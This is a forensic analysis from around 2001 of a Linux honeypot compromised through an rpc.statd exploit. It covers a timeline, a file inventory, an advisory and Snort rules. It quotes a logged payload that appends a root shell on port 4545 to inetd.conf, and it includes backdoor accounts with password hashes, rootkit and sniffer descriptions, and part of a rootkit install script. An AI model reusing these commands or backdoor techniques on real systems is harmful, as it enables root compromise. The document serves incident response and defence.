By

 

Royans K Tharakan < rkt(at)pobox.com >

http://security.royans.net/

 

 

Date: 11 Feb 2000

 

 

Contents:

 

Section 1: Q1 :Identify the intrusion method, its date, and time. (Assume the clock on the IDS was synchronized with an NTP reference time source.)

Section 2: Q2 : Identify as much as possible about the intruder(s).

Section 3: Was there a "rootkit" or other post-concealment Trojan horse programs installed on the system? If so, what operating system programs were replaced and how could you get around them?

Section 4: Was there a sniffer or password-harvesting program installed? If so, where and what files are associated with it?

Section 5: List all the files that were added/modified by the intruder. Provide an analysis of these programs

Section 6: What is publicly known about the source of any programs found on the system?

Section 7: Build a time line of events and provide a detailed analysis of activity on the system, noting sources of supporting or confirming evidence

Section 8:  Provide a report suitable for management or news media

Section 9:  Provide an advisory for use within the home organization (a fictitious university, "honeyp.edu", in this case, where I hold an honorary Doctorate, by the way) to explain the key aspects of the vulnerability exploited, how to detect and defend against this vulnerability, and how to determine if other systems were similarly compromised.

Section 10:  Produce a cost-estimate for this incident using the following guidelines and method:

 

 

 

 

Section 1: Identify the intrusion method, its date, and time. (Assume the clock on the IDS was synchronized with an NTP reference time source.)

 

The attack used looks like a statd exploit by ron1n. However the time of attack as indicated by the honeynet project could be disputed. /var/log/message recovery from the disk indicates that the attack took place at around "Nov 8: 00:09:00" instead of ¨Nov 7: 23:11:51" as indicated by the webside. Of course this could mean that these two equipments were at two different time zones too. If RH box was at CST (­0600) then the snort was running at -0700 time zone.

 

Nov  8 00:08:41 apollo inetd[408]: pid 2077: exit status 1

Nov  8 00:08:41 apollo inetd[408]: pid 2078: exit status 1

Nov  8 00:09:00 apollo rpc.statd[270]: SM_MON request for hostname containing '/': ^D...^D...^E...^E...^F...^F...^G...^G...08049f10 bffff754 000028f8 4d5f4d5

 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f 000000000000000000000000000000000000000000000000000000000000000000

0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

000000000bffff70400000000000000000000000000000000000000000000000bffff7050000bffff7060000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000bffff707.......................................

...........K^.v... .^(.. .^... .^... .. ..#.^.1... .F'.F*.. .F..F..+, ...N..V...1...@......./bin/sh -c echo 4545 stream tcp nowait root /bin/sh sh -i >> /etc

inetd.conf;killall -HUP inetd

Nov  8 04:02:00 apollo anacron[2159]: Updated timestamp for job `cron.daily' to 2000-11-08

 

 

The attacker modified and restarts inetd. The modification allowed the attacker to login as root without password using /bin/sh on port 4545.

 

 

 

 

Section 2: Identify as much as possible about the intruder(s).

 

Probably from a machine in Texas. However the attacker uses a directory name “paki” which is not particularly a common word. It is very much possible that the real attackers start out from somewhere in Pakistan.

 

216.216.74.2 = ATHM-216-216-xxx-2.home.net :  This is probably a rooted box on a cable network

 

Advanced Commerce Systems (NETBLK-ATWORK-WI33381)

   5910 N. Central Expressway, Suite 1040

   Dallas, TX 75206

   US

 

   Netname: ATWORK-WI33381

   Netblock: 216.216.74.0 - 216.216.74.15

 

   Coordinator:

      Anderson, Michael J.  (MJA-ARIN)  mianders@ADVANCEDCOMMERCE.COM

      214-891-6306

 

   Record last updated on 26-Jul-1999.

   Database last updated on 6-Feb-2001 18:34:51 EDT.

 

 

 

Section 3: Was there a "rootkit" or other post-concealment trojan horse programs installed on the system? If so, what operating system programs were replaced and how could you get around them?

 

Though I’ve not been able to find out which exact rootkit was used, I can provide with a brief analysis of what was replaced.

The kit used has resemblence to lrk and ark. I believe its closer to lrk.

 

Files Replaced – backdoored (to hide presence)

/bin/ps, /usr/bin/top, /usr/sbin/syslogd, /bin/ls , /sbin/ifconfig, /bin/netstat, /usr/sbin/tcpd, /usr/sbin/in.identd, /usr/sbin/in.ftpd

 

Packages Added – mostly to patch holes.

Wuftp, lpd, amd (auto mounter), named

 

Other files modified/replaced during attack:

Nov 08 00 06:56:59    17968 ..c -rwx------ root     root     /bin/ping

                      45388 ..c -rwx------ root     tty      /sbin/dump

                      67788 ..c -rwx------ root     tty      /sbin/restore

                      33288 ..c -rwx------ root     root     /usr/bin/at

                      35168 ..c -rwx------ root     root     /usr/bin/chage

                      36756 ..c -rwx------ root     root     /usr/bin/gpasswd

                       5640 ..c -rwx------ root     root     /usr/bin/newgrp

                     531516 ..c -rwx------ root     root     /usr/bin/sperl5.00503

                     531516 ..c -rwx------ root     root     /usr/bin/suidperl

                      34751 ..c -rwx------ root     root     /usr/libexec/pt_chown

                      16488 ..c -rwx------ root     bin      /usr/sbin/traceroute

                       5896 ..c -rwx------ root     root     /usr/sbin/usernetctl

 

Config files involved - /dev/ptyp, /usr/man/.a , /usr/man/.p , /usr/man/p , /usr/man/q, /usr/man/r

 

 

 

Section 4: Was there a sniffer or password harvesting program installed? If so, where and what files are associated with it?

 

Sniffer used is "linsniffer" by Mike Edulla medulla@infosoc.com. The file "tcp.log" in /usr/man/.Ci could be part of this originaly.

 

But the real log file was /var/tmp/nap

The following executable shell script is also part of this distribution. It does some clean up to remove old nap logs.

/usr/man/.Ci/ /Anap

 

Look at the Appendix for source code of this sniffer.

 

 

Section 5: List all the files that were added/modified by the intruder. Provide an analysis of these programs

 

Filename

Apparent Author

Description

/dev/ptyp

Author of Rootkit

Txt file which has info about stuff which needs to be invisible to "ps" and "top"

/usr/libexec/awk/addy.awk

/usr/man/.Ci/addn

usr/man/.Ci/addn writes to this, looks like a mstream configfile ?

/usr/man/.Ci/a.sh

Attacker

makes sure rpc stuff is gone

/usr/man/.Ci/addn

Author of Rootkit

This is some Ddos Tool

/usr/man/.Ci/backup/

Author of Rootkit

this is where the real binaries are...

/usr/man/.Ci/bx

Attacker

looks like bitchx

/usr/man/.Ci/chmod-it

Author of Rootkit

fixes permissions on newly installed binaries

/usr/man/.Ci/clean

Attacker

uses "snap" to clean the log files

/usr/man/.Ci/do

Attacker

cleans up the passwd/shadow file. removes "own" and "adm1" account.   one of these accounts is a root account, other is a user account

/usr/man/.Ci/find

Author of Rootkit

Backdoored find

/usr/man/.Ci/inetd

Author of Rootkit

backdoored inetd

/usr/man/.Ci/killall

Author of Rootkit

backdoored killall

/usr/man/.Ci/needz

Attacker

installs pico and screen for putting bot in the background

/usr/man/.Ci/paki/slice

Not Known

Syn Flooder source code with spoofed source address

/usr/man/.Ci/paki/stream.c

Not Known

another one

/usr/man/.Ci/pstree

Author of Rootkit

fixed pstree

/usr/man/.Ci/q

Mixter

remote client and server control for Q by Mixter

/usr/man/.Ci/qs

Mixter

remote client and server control for Q by Mixter

/usr/man/.Ci/rmS

Attacker

clean up few installation files...

/usr/man/.Ci/scan/amd/a.sh

Attacker

scans for a class b network 206.110.0.0/16 port 111

/usr/man/.Ci/scan/amd/ben.c

ryan@junker.org

Gets RPC ID from a rpc server.

/usr/man/.Ci/scan/amd/amdx

Ron1n

statd exploit

/usr/man/.Ci/scan/amd/pscan

Unknown

Usage: %s <b-block> <port> [c-block]\n", argv[0]

Purpose: looks for a specific open port accross a class b/c network. Its not a generic port scanner, but a scanner to look for

specific ports. Something which can b used for looking for rpc ports.

 

Relevent Code:

               connlist[i].addr.sin_addr.s_addr = inet_addr(ip);

               if (connlist[i].addr.sin_addr.s_addr == -1)

                 fatal("Invalid IP.");

               connlist[i].addr.sin_family = AF_INET;

               connlist[i].addr.sin_port = htons(atoi(argv[2]));

               connlist[i].a = time(0);

               connlist[i].status = S_CONNECTING;

 

/usr/man/.Ci/scan/bind/ibind.sh

Not Known

Usage: echo "Usage: ./ibind.sh <b or c class>"

Purpose: looks for bind holes and makes a list of different kinds of holes.

 

This section does a dig request for bind info

---------

for i in Cat $FILE; do

        dig version.bind @$i chaos txt >> $OUT 2>/dev/null &

done

 

This section catalogs info

---------

cat $OUT|grep -v ";;" >> $VULN1

cat $VULN1|grep -v "server" >> $VULN2

cat $VULN2|grep -v "@0" >> $VULN3

cat $VULN3|grep -v "@3" >> $VULN4

cat $VULN4|grep -v "@4" >> $VULN5

cat $VULN5|grep -v "@-" >> $VULN6

cat $VULN6|grep -v "@sec" >> $VULN7

cat $VULN7|grep -v "@Scan" >> $VULN8

cat $VULN8|grep -v "@completed" >> $VULN9

cat $VULN9|grep -v "8.2.2-P" >> $VULN10

/usr/man/.Ci/scan/daemon/lscan2.c

Mixter

A generic scanner to look for systems with either

bind(53), pop(110), pop2(109),imap(143),ftp(21)

/usr/man/.Ci/scan/daemon/z0ne

Unknown

this is a dDos tool. I'm not exactly sure of what type.

/usr/man/.Ci/scan/fs

Author of Rootkit

 

/usr/man/.Ci/scan/port/strobe

*Proff* (proff@suburbia.apana.org.au)

scanner 

/usr/man/.Ci/scan/statd/classb

Attacker

 

/usr/man/.Ci/scan/statd/r

Unknown

rpc port scanner

/usr/man/.Ci/scan/statd/statdx

Unknown

exploit for statd

/usr/man/.Ci/scan/wu

Unknown

scans for rpc/ttdbserver/wingate

/usr/man/.Ci/scan/x/pscan

Unknown

 -- scanner

/usr/man/.Ci/scan/x/x

Unknown

exploit for x

/usr/man/.Ci/scan/x/xfil

Unknown

 

/usr/man/.Ci/scan/x/xscan

Attacker

scan for x servers

/usr/man/.Ci/snap

Attacker

called by clean to cleanup the log files.

/usr/man/.Ci/sniff

Mike Edulla medulla@infosoc.com

     Sniffer used is "linsniffer"

/usr/man/.Ci/sp.pl

Attacker

 

/usr/man/.Ci/syslogd

Author of Rootkit

 

/usr/man/.a

Attacker

This has some IP's might be used by some package to hide these connections

/usr/man/.p

Attacker

same a /dev/ptyp… only smaller in size…

/usr/man/p

Attacker

same as /usr/man/.p

/usr/man/r

Attacker

donno… looks similar…

/var/tmp/nap

 

Password sniffing log generated by snif

/usr/man/.Ci/ /Anap

Attacker

Anti NAP ? Heh.. Removes the nap log… should be triggered by one of the proggies to clean nap… just incase..

/usr/bin/pawd

Author of Rootkit

What does this do ??

/tmp/.bash_history -> /dev/null

 

This was probably part of the "own"/"adm1" account

/root/.bash_history -> /dev/null

 

This was to hide logs of root's action on the box

/usr/man/.Ci/fix

Author of Rootkit

This trojans the real files and uses the backup to keep funtionality.

/usr/games/.bash_history -> /dev/null

 

This was to hide logs of root's action on the box

/bin/ps

Author of Rootkit

 

/usr/bin/top

Author of Rootkit

 

/usr/sbin/syslogd

Author of Rootkit

 

Backup

Author of Rootkit

 

/sbin/ifconfig

Author of Rootkit

 

/bin/netstat

Author of Rootkit

 

/usr/sbin/tcpd

Author of Rootkit

 

/usr/sbin/in.identd

Author of Rootkit

 

/usr/sbin/in.ftpd

Author of Rootkit

 

 

 

 

Section 6: What is publicly known about the source of any programs found on the system?

 

Mixter – lscan2.c, q, qs

Ron1n- amdx, statd exploit used

Strobe- proff

Linsniffer- mike edulla

Ben.c - rayn

 

 

Section 7: Build a time line of events and provide a detailed analysis of activity on the system, noting sources of supporting or confirming evidence

 

Nov  8: 00:09:00

 

The attack used looks like a statd exploit by ron1n. However the time of attack as indicated by the honeynet project could be disputed. /var/log/message recovery from the disk indicates that the attack took place at around "Nov 8: 00:09:00" instead of ¨Nov 7: 23:11:51" as indicated by the webside. Of course this could mean that these two equipments were at two different time zones too. If RH box was at CST (­0600) then the snort was running at -0700 time zone.

 

Nov  8 00:08:41 apollo inetd[408]: pid 2077: exit status 1

Nov  8 00:08:41 apollo inetd[408]: pid 2078: exit status 1

Nov  8 00:09:00 apollo rpc.statd[270]: SM_MON request for hostname containing '/': ^D...^D...^E...^E...^F...^F...^G...^G...08049f10 bffff754 000028f8 4d5f4d5

 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f 000000000000000000000000000000000000000000000000000000000000000000

0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

000000000bffff70400000000000000000000000000000000000000000000000bffff7050000bffff7060000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000bffff707.......................................

...........K^.v... .^(.. .^... .^... .. ..#.^.1... .F'.F*.. .F..F..+, ...N..V...1...@......./bin/sh -c echo 4545 stream tcp nowait root /bin/sh sh -i >> /etc

inetd.conf;killall -HUP inetd

Nov  8 04:02:00 apollo anacron[2159]: Updated timestamp for job `cron.daily' to 2000-11-08

 

 

The attacker modified and restarts inetd. The modification allowed the attacker to login as root without password using /bin/sh on port 4545.

 

Nov 8: 06:25:53

 

The attacker probably had run an automated attack tool. The first time the attacker logged in was at 0625 (CST). Among the first few actions the

attacker took, included creation of two different accounts on the system "own" and "adm1". Probably this was used by the attacker to ssh/telnet

back to the system and then gain local root access using su. This modification  was later removed using “do” script.

 

/etc/passwd

own:x:0:0::/root:/bin/bash

adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash

 

/etc/shadow

own::10865:0:99999:7:-1:-1:134538460

adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412

 

 

Nov 8: 06:29:27

Though I cannot confirm this, I feel the attacker at this point did an FTP to an unknown site from where he downloaded the rootkit+otherstuff.

 

Nov 08 00 06:29:27    63728 .a. -rwxr-xr-x root     root     /usr/bin/ftp

 

Nov 8: 06:45:18

Someone logged in (probably the attacker using the new account)

Nov 08 00 06:45:18      161 .a. -rw-r--r-- root     root     /etc/hosts.allow

                          0 .a. -rw-r--r-- root     root     /etc/hosts.deny

Nov 08 00 06:45:19       63 .a. -rw-r--r-- root     root     /etc/issue.net

Nov 08 00 06:45:24     1504 .a. -rw-r--r-- root     root     /etc/security/console.perms

 

 

Nov 8: 06:51:53    

The attacker untars and changes permissions of the tools installed in

 

/usr/man/.Ci

 

Nov 08 00 06:51:54      714 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/a.sh

                       7229 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/snif

Nov 08 00 06:51:55      698 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/clean

                     147900 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/inetd

 

After installation of tool the attacker modified and added a few files to the OS.  "amd" which looks like "automounter" is installed.

ldconfig is run.

 

Nov 8: 06:52:09

This is probably when the rootkit script was run. The rootkit as you can see from the file attached installs ssh/ftp/named/lpd and backdoors a lot of

binaries with its own version of binaries.... probably ftp/lpd/named were updated to fix holes...

 

Nov 08 00 06:55:58      657 m.c -rw-r--r-- root     root     /etc/passwd

                        601 m.c -rw-r--r-- root     root     /etc/shadow

 

Nov 8: 06:54:22

Named installed

Nov 08 00 06:54:22     6416 mac -rwxr-xr-x root     root     /usr/local/bin/addr

 

Nov 8: 06:59:07

Either the intruder himself (I don’t think though) or someone else logged in as “drosen” and /var/tmp/nap got its first password entry.

Nov 08 00 06:59:07     4096 m.c drwx------ drosen   drosen   /home/drosen

 

Nov 8: 07:03:05

Inetd.conf changed and entry for sh on port 4545 removed

Nov 08 00 07:03:05     3027 m.c -rw-r--r-- root     root     /etc/inetd.conf

 

Nov 8: 18:37:30

Admin logged in at this time, and found problems. Within two hours the system was brought down for analysis

 

Nov 08 00 18:37:30    20452 .a. -rwxr-xr-x root     root     /bin/login

                       1262 .a. -rw-r--r-- root     root     /etc/localtime

                        437 .a. -rw-r--r-- root     root     /etc/pam.d/login

 

 

 

 

 

 

Section 8:  Provide a report suitable for management or news media

 

We regret to announce that one of our servers Apollo was comprimised on Novermber 8th by unknown intruders.

 

The attackers used a security hole in our “rpc.statd” to gain access to our server. Later during that day the attacker installed a few tools on the server and implemented backdoors to hide the attacker from a normal user on the system. Some of the tools installed indicates that the attacker was making an attempt to install a DdoS tool on this server to attack other servers outside. Also found were tools like “BitchX” which would have allowed the attacker to control the server from a IRC channel behind an anonymous nickname.

 

We have taken precautionary measures and are doing a full scale organization search for other signs of compromise.  Our priliminary investigation shows that this was the only system compromised and nothing sensative was stolen.  We have contacted the ISP from where the attack originated are making an attempt to identify the attackers.

 

We have upgraded our Firewall filters to detect these attacks on the border and have sent a notification to all Sysadmins in our orgnization to advise them how to secure their systems so that this does not happen again.

 

As of 0600 hrs Nov 9th, we have brought Apollo back online for normal use.

 

 

 

Section 9:  Provide an advisory for use within the home organization(a fictitious university, "honeyp.edu", in this case, where I hold an honorary Doctorate, by the way) to explain the key aspects of the vulnerability exploited, how to detect and defend against this vulnerability, and how to determine if other systems were similarly compromised.

 

===============================================================================

Issued by: Security Team, Honeyp.edu

 

Topic: rpc.statd exploit warning Advisory

 

Announced: 11th Feb 2001

OS Effected: All Linux Distributions with un-patched rpc.statd

Solution Available: Yes

Severity: root compromise

===============================================================================

 

I. Abstract

 

We have noticed detected an increase in attacks on Linux based servers all around  the world. Anyone running unpatched version of RPC on Linux Redhat is open to  this attack.

 

II. Anatomy of the Attack

 

In this particular attack the attacker uses common rpc.statd buffer overflow exploit to gain root compromise. This requires "rpc.statd" to be running on

the box. The  attacker then modifies and re-starts inetd with a shell bound to a port.

 

Attacker installs a rootkit (possibily lrk/ark) with password sniffing ability. The rootkit modifies and installs a few critical binaries including ps, top, syslogd, ls, ifconfig, netstat tcpd and identd.  The attacker also installs his own version of sshd and wuftp.

 

III. Incident Detection

 

If you are running a version of unpatched rpc.statd then you should start looking for signs of compromise immediately before you do a upgrade. Check

for MD5 signatures of your binaries. If you suspect any changes you are  recomended to reinstall the OS. Another quicker way of checking weather this

exact attack was used against you, you could check for the existance of "/usr/man/.Ci/backup/ls" by executing it.

 

IV. Detailed File Descriptions

 

The attacker installs a password harvesting program and runs a DdoS tool kit on the server.

 

/dev/ptyp  -- Txt file which has info about stuff which needs to be invisible to "ps" and "top"

/usr/libexec/awk/addy.awk -- usr/man/.Ci/addn writes to this, looks like a mstream configfile ?

/usr/man/.Ci/a.sh  -- makes sure rpc stuff is gone

/usr/man/.Ci/addn -- This is some Ddos Tool

/usr/man/.Ci/backup/ -- this is where the real binaries are...

/usr/man/.Ci/bx -- looks like bitchx

/usr/man/.Ci/chmod-it --  fixes permissions on newly installed binaries

/usr/man/.Ci/clean -- uses "snap" to clean the log files

/usr/man/.Ci/do -- cleans up the passwd/shadow file. removes "own" and "adm1" account.   one of these accounts is a root account, other is a user account

/usr/man/.Ci/find -- Backdoored find

/usr/man/.Ci/inetd -- backdoored inetd

/usr/man/.Ci/killall -- backdoored killall

/usr/man/.Ci/needz -- installs pico and screen for putting bot in the background

/usr/man/.Ci/paki/slice -- Syn Flooder source code with spoofed source address

/usr/man/.Ci/paki/stream.c -- another one

/usr/man/.Ci/pstree -- fixed pstree

/usr/man/.Ci/q -- remote client and server control for Q by Mixter

/usr/man/.Ci/qs -- remote client and server control for Q by Mixter

/usr/man/.Ci/rmS --  clean up few installation files...

/usr/man/.Ci/scan/amd/a.sh -- scans for a class b network 206.110.0.0/16 port 111

/usr/man/.Ci/scan/amd/ben.c -- Gets RPC ID from a rpc server.

/usr/man/.Ci/scan/amd/amdx --  statd exploit 

/usr/man/.Ci/scan/amd/pscan --  looks for a specific open port accross a class b/c network. Its not a generic port scanner, but a scanner to look for

  specific ports. Something which can b used for looking for rpc ports.

/usr/man/.Ci/scan/bind/ibind.sh --   looks for bind holes and makes a list of different kinds of holes.

/usr/man/.Ci/scan/daemon/lscan2.c  -- A generic scanner to look for systems with either

/usr/man/.Ci/scan/daemon/z0ne --  this is a dDos tool. I'm not exactly sure of what type.

/usr/man/.Ci/scan/fs

/usr/man/.Ci/scan/port/strobe  --  scanner  

/usr/man/.Ci/scan/statd/classb

/usr/man/.Ci/scan/statd/r --  rpc port scanner

/usr/man/.Ci/scan/statd/statdx  --  exploit for statd

/usr/man/.Ci/scan/wu --  scans for rpc/ttdbserver/wingate

/usr/man/.Ci/scan/x/pscan --  scanner

/usr/man/.Ci/scan/x/x -- exploit for x

/usr/man/.Ci/scan/x/xfil 

/usr/man/.Ci/scan/x/xscan --  scan for x servers

/usr/man/.Ci/snap --  called by clean to cleanup the log files.

/usr/man/.Ci/sniff -- Mike Edulla medulla@infosoc.com

/usr/man/.Ci/sp.pl

/usr/man/.Ci/syslogd

/usr/man/.a --  This has some IP's might be used by some package to hide these connections

/usr/man/.p --  same a /dev/ptyp… only smaller in size…

/usr/man/p --  same as /usr/man/.p

/usr/man/r --   donno… looks similar…

/var/tmp/nap--   Password sniffing log generated by snif

/usr/man/.Ci/ /Anap --   Anti NAP ? Removes the nap log… should be triggered by one of the proggies to clean nap… just incase..

/usr/bin/pawd --    What does this do ??

/tmp/.bash_history -> /dev/null --   This was probably part of the "own"/"adm1" account

/root/.bash_history -> /dev/null --    This was to hide logs of root's action on the box

/usr/man/.Ci/fix --   This trojans the real files and uses the backup to keep funtionality.

/usr/games/.bash_history -> /dev/null --   This was to hide logs of root's action on the box

 

IV. Incident Recover

 

Though the recomended way of recovery is full reinstall, you could clean up the system in other ways too, provided this was the only instance of root compromise on your system.

 

cd /usr/man/.Ci/backup

cp ps /bin/ps

cp top /usr/bin

cp syslogd /usr/sbin/syslogd

cp ls /bin/ls

cp ifconfig /sbin/ifconfig

cp netstat /bin/netstat

cp tcpd /usr/sbin/tcpd

cp in.identd /usr/sbin

rm -r -f /usr/man/.Ci

rm /bin/bx

rm /usr/sbin/sshd

rm /usr/local/sbin/sshd

rm /dev/ptyp

rm /usr/man/.a

rm /usr/man/.p

rm /usr/man/q

rm /usr/man/r

rm /usr/libexec/awk/addy.awk

rm /usr/bin/screen

rm /usr/bin/telnet

rm /etc/skel/.screenrc

rm /bin/ping

rm /sbin/dump

rm /sbin/restore

rm /usr/bin/at

rm /usr/bin/chage

rm /usr/bin/gpasswd

rm /usr/bin/newgrp

rm /usr/bin/sperl5.00503

rm /usr/bin/suidperl

rm /usr/libexec/pt_chown

rm /usr/sbin/traceroute

rm /usr/sbin/usernetctl

 

 

Note: your system might be unusable untill you install ssh and telnet all over again. Contact your vendor for latest set of binaries.

 

V Files Modified

 

Primary Rootkit files

            /bin/ps

            /usr/bin/top

            /usr/sbin/syslogd

            /sbin/ifconfig

            /bin/netstat

            /usr/sbin/tcpd

            /usr/sbin/in.identd

            /usr/sbin/in.ftpd

           

Others modified/replaced

/bin/ping

/sbin/dump

/sbin/restore

/usr/bin/at

/usr/bin/chage

/usr/bin/gpasswd

/usr/bin/newgrp

/usr/bin/sperl5.00503

/usr/bin/suidperl

/usr/libexec/pt_chown

/usr/sbin/traceroute

/usr/sbin/usernetctl

 

VI Rootkit Details

 

Files Modified: /bin/ps, /usr/bin/top, /usr/sbin/syslogd, /bin/ls , /sbin/ifconfig, /bin/netstat, /usr/sbin/tcpd, /usr/sbin/in.identd, /usr/sbin/in.ftpd

Config files: involved - /dev/ptyp, /usr/man/.a , /usr/man/.p , /usr/man/p , /usr/man/q, /usr/man/r

 

VII Detection

 

We recommend installation of snort http://www.snort.org for detection of rpc scan activity.

 

Snort does detect rpc activity using the following ruleset

            alert TCP $EXTERNAL any -> $INTERNAL any (msg: "IDS442/rpc-statdx-exploit"; flags: AP; content: "/bin|c74604|/sh";)”

            Also look at http://whitehats.com/info/IDS442

 

Port scanning should be always looked at with suspicion

alert TCP $EXTERNAL any -> $INTERNAL any (msg: "IDS441/probe-Synscan-Portscan"; id: 39426; flags: SF;)
Also look at http://whitehats.com/info/IDS441

 

Chkrootkit is a nice tool which you to run automatic rootkit scanners on your servers.

            More info is available at http://www.chkrootkit.org/

 

Use CRC checking: like tripwire and fcheck to regularly look for problems

            More info at http://www.tripwire.com

            And at http://freshmeat.net/projects/fcheck/

 

VIII. Incident Reporting

 

If you system is already compromised, and if the server is not critical, we Request you to let us know so that we can do further investigation of the incident.

 

IX Recomendations

 

Its possible that your system is wide open for other attacks too. Patch your system immediately with latest set of OS patches. Remove all services not

required in inetd. Mount the root and /usr as “read-only” if possible. And keep a look out for trouble.

 

 

 

Section 10:  Produce a cost-estimate for this incident using the following guidelines and method:

 

Experiance in Sysadmin:

        2 years on Solaris, 5 on other Unix/Linux.

        I've done enough programming to learn something new pretty fast.

        I use perl/shell/php regularly for my regular stuff.

        I am security aware Admin. and I am hooked onto BugTraqs

        and other incident lists.

 

Effort put in: I must have put an estimated 40 Hours for this Investigation.

And another 40 hours to make this write up. But that is more becuase I didn't

know where to start from :) Next time it would be faster...

 

Cost: It would be close to 1000 Dollars atleast. Though I'm sure people would

charge much higher for such kind of analysis.

 

 

Section 11: How did I do the forensic investigation

 

After mounting the drives as readonly, the first thing I did was have a look around the drive to see if I could see something with my bare eyes (no

tools). Next I tried using find to see if the timestamps can help me.

 

Ofcourse that was a very inefficient route to take, and I should have used TCT from the very beginning.

 

Once I had TCT compiled I used mactime to do most of my work. I got a list of "accessed" files, and those which were "modified". Most of the work ewent

into analysing the various timestamps and reconstructing what happened when.

 

Once I had a fair idea of what was installed and what could have been modifed I started hunting for answers in the deleted files. Unfortunately mactime didn't give me info about stuff which has been deleted. I'm sure there are a million ways of doing this, but I used the "HEX FILE viewer" in "mc" for my job. I specifically looked for the /var/logs/messages file and the passwd/shadow file.

 

I also found the rootkit install script as a bonus during the process. All of the above actually helped me confirm the timeline I created earlier.

 

The most difficult part of the challenge was writing up this documentation in a readable format for everybody to understand.  I’ve listed below the various references I used which I used to write this documentation. I wish to make a special mention that Max Vision’s “Ramen Analysis”  had a lot to do with HTML formatting of this document. That is also one of the most interesting pieces of analysis I’ve read in a while.

Section 11: Refernces

 

"Multiple Linux Vendor rpc.statd Remote Format String Vulnerability", http://www.securityfocus.com/bid/1480 "statdx.c" exploit by ron1n, posted to Bugtraq mailing list

“Redhat Linux 6.x remote root exploit”: http://www.kulua.org/Archives/kulua-l/200008/msg00159.html  by "Christofer C. Bell" <cbell@jayhawks.net>

“Refence of addy.awk as part of rootkit”: http://www.cs.fiu.edu/campus/cndg/msg00007.html  by David Dittrich 
“mstream analysis”: http://staff.washington.edu/dittrich/misc/mstream.analysis.txt by David Dittrich

“Multiple Linux Vendor rpc.statd Remote Format String Vulnerability” :http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fsection%3Dexploit%26vid%3D1480 by ron1n <shellcode@hotmail.com>
Explaination of exploit” http://security-archive.merton.ox.ac.uk/bugtraq-200008/0091.html ron1n - (shellcode@HOTMAIL.COM)

“Exploit signature”: http://www.whitehats.com/info/IDS442

“A very old statd exploit”: http://p.ulh.as/xploitsdb/SunOS/statd.html

“How to do a Forensic analysis”: http://staff.washington.edu/dittrich/misc/forensics/ by David Dittrich

“How Statd exploit looks like 1”:http://www.sans.org/y2k/081600.htm

“How Statd exploit looks like 2”:http://www.sans.org/y2k/110900.htm

“CERT Advisory” http://www.cert.org/incident_notes/IN-2000-10.html

"Redhat Errata", http://www.redhat.com/support/errata/

“Links to more resources” : http://security.royans.net/static/resource.shtml

“How pscan is used: An old version of pscan is discussed here” http://www.khubla.com/bhack.html#SkipFileList

“Discussion on z0ne :” http://project.honeynet.org/papers/motives/day4.txt

 

 

 

 

Section 12: Files included

 

 

APPENDIX A: RECOVERED SHADOW FILE

APPENDIX B: RECOVERED ROOTKIT INSTALL SCRIPT

APPENDIX C:  LINSNIFFER

APPENDIX D: FILES MODIFIED - lists only files which were modified

APPENDIX E: FILES ACCESSED TIMES – lists files accessed and modified

 

 

 

 

APPENDIX A: RECOVERED SHADOW FILE

 

/etc/passwd

bin:x:1:1:bin:/bin:

daemon:x:2:2:daemon:/sbin:

adm:x:3:4:adm:/var/adm:

lp:x:4:7:lp:/var/spool/lpd:

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:

news:x:9:13:news:/var/spool/news:

uucp:x:10:14:uucp:/var/spool/uucp:

operator:x:11:0:operator:/root:

games:x:12:100:games:/usr/games:

gopher:x:13:30:gopher:/usr/lib/gopher-data:

ftp:x:14:50:FTP User:/home/ftp:

nobody:x:99:99:Nobody:/:

xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false

named:x:25:25:Named:/var/named:/bin/false

postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash

drosen:x:500:500::/home/drosen:/bin/bash

own:x:0:0::/root:/bin/bash

adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash

 

/etc/shadow

6Z/:11266:0:99999:7:-1:-1:134540356

bin:*:11266:0:99999:7:::

daemon:*:11266:0:99999:7:::

adm:*:11266:0:99999:7:::

lp:*:11266:0:99999:7:::

sync:*:11266:0:99999:7:::

shutdown:*:11266:0:99999:7:::

halt:*:11266:0:99999:7:::

mail:*:11266:0:99999:7:::

news:*:11266:0:99999:7:::

uucp:*:11266:0:99999:7:::

operator:*:11266:0:99999:7:::

games:*:11266:0:99999:7:::

gopher:*:11266:0:99999:7:::

ftp:*:11266:0:99999:7:::

nobody:*:11266:0:99999:7:::

xfs:!!:11266:0:99999:7:::

named:!!:11266:0:99999:7:::

postgres:!!:11266:0:99999:7:::

drosen:$1$X2MTV07B$jKfJisg1QOjpfXouUcg0i0:11266:0:99999:7:-1:-1:134540380

own::10865:0:99999:7:-1:-1:134538460

adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412

 

 

APPENDIX B: RECOVERED ROOTKIT INSTALL SCRIPT

 

 

File: honeypot.hda5.dd  Col 0              1229728Kb bytes                                                                                                 87%

................echo "installing sshd"

gunzip ssh-1.2.27*

tar -xvf ssh-1.2.27*

cd ssh*

make install

rm -rf /etc/sshd_config

cat << hi >> /etc/sshd_config

# This is ssh server systemwide configuration file.

 

Port 22

ListenAddress 0.0.0.0

HostKey /etc/ssh_host_key

RandomSeed /etc/ssh_random_seed

ServerKeyBits 768

LoginGraceTime 600

KeyRegenerationInterval 3600

PermitRootLogin yes

IgnoreRhosts no

StrictModes yes

QuietMode yes

X11Forwarding yes

